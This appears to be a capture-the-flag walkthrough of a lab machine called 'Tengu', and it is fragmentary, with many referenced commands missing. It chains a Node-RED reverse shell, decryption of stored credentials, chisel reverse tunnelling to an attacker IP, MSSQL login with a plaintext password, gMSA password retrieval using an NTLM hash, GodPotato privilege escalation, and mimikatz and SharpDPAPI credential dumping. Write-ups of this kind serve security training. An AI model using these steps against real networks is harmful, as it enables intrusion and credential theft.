Tengu
Found Node-red on one of the 3 machines and created a node to get reverse shell and got ssh access.
Now enumerating Node-red found creds for MSSQLwhich contains some credential files
We can find this in the files:
Now we need to decrypt this password: https://blog.hugopoi.net/en/2021/12/28/how-to-decrypt-flows_cred-json-from-nodered-data/ Running it now: ./cred_decode.sh . ./cred_decode.sh .
Now checking access to mssql from this machine:
Now we can port forward with chisel Target: ./chisel client 10.8.1.208:8001 R:socks Attacker: chisel server --reverse --socks5 -p 8001 
Now using proxychains with mssqlclient:
proxychains mssqlclient.py nodered_connector:'DreamPuppyOverall25'@10.10.135.166Now enumerating database DemoS
And using crackstation we get the password
Now checking linux for the realm we can switch to domain user and get flag: 
Now using KeyTabExtract on /etc/krb5.keytab 
Using bloodhound:
We can get gmsa password with
proxychains nxc ldap tengu.vl -u NODERED$ -H d4210ee2db0c03aa3611c9ef8a4dbf49 --gmsa
Now we can use this to impersonate users in the SQL)ADMINS group 
There's 2 users in the group: 
Trying T1_C.FOWLER
Not allowed
Now trying t1_m.winters we get a ticket.
To login to mssql:
Now we can get reverse shell with:
Now we can use Godpotato as we have SeImpersonate permission: 
Now using mimikatz:

Now using [[SharpDPAPI]] we can get credentials 
Using these credentials with netexec we get STATUS_ACCOUNT_RESTRICTION
We can use kerkeros authentication:
Then use
Last updated
Was this helpful?